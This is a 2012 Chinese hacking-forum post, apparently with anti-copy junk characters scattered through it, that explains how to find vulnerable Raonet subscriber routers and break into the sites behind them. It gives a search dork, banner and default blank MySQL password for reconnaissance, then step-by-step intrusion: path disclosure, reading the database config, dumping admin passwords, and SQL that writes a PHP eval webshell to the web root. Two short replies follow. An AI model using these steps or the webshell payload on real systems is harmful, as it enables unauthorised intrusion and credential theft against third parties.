找回密码
 立即注册
查看: 3908|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
) l. a; m( z  f, h9 g5 S. G. w6 Z5 o0 n/ A7 n! ~! J. W4 _
1:google搜索'Raonet Subscriber Ethernet Router'5 x% b, s$ n, o3 Z5 N
) q* m) C, L' p$ W. S
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
! r0 m, _- X% m% W% p. @* r4 v: u+ j7 r1 Z5 D8 _7 R
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。* r3 F; B0 n# C) L  U* {- _
- _5 |7 o" X5 L+ v4 Z, p/ ~# c
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......8 u6 Q9 E; Y1 X, ^0 A( c

+ V  l1 B# \4 o: F, A2 c- N- D ! Q$ ]; z, H2 ?9 x5 S
4 ^) `/ e8 K, r) E' ^, _4 ]
入侵步骤:4 w) J! f* {% @. `" D, T4 e

7 N& {6 E0 d  j1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php% e1 n% T- B* d2 y

7 |. V0 [+ ~) [6 T% r2 U2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
3 Q/ A1 H& T$ S3:得到密码后连接,查看GUI管理密码:
7 o. o' D% C$ w$ n2 iuse ser_500
! Z  L- Z1 i  a2 \" Fselect id,passwd from user;( L% {7 u7 C1 Y; T5 ]
4:通过数据库写入webshell,执行命令:; h! p0 l6 q: |9 v
use mysql;3 R3 J# S4 R) _
create table ok(cmd TEXT);
  S( B; a  R# P) z+ c4 u2 |3 O. Minsert into ok values("<?php @eval($_POST[cmd])?>");/ @1 T% _9 e& V) m* j7 y
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
; _  o0 N. F7 M$ B: ldrop table ok;
* D: u+ d( R" x% I( l  Z/ y9 r0 Z' ~0 z3 ?/ ?- S+ P
5:连接后门shell.php : h; |1 E7 K+ T3 k0 m5 M' _6 M3 F
! A0 t% w& l+ N3 ^7 P9 T; l
6. 搞定!) g" ~1 y  p% Y1 x# w
& t* O! D. O% f0 P7 b" i- s
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表